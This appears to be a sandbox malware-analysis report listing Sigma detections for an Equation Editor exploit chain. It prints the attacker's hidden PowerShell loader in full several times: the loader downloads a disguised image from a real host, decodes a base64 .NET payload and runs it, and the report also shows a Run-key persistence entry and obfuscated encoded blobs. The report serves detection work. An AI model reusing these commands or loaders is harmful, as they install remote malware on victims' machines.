eGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1932, Protocol: tcp, SourceIp: 5.182.211.151, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLin

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 8.8.8.8, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3076, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 52917

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1932, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , ProcessId: 3076, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1932, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , ProcessId: 3076, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\word.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3248, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3476, TargetFilename: C:\ProgramData\word.vbs

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.67.19.24, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3076, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs, ProcessId: 3476, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLin

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLin

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1932, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" , ProcessId: 3076, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1932, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre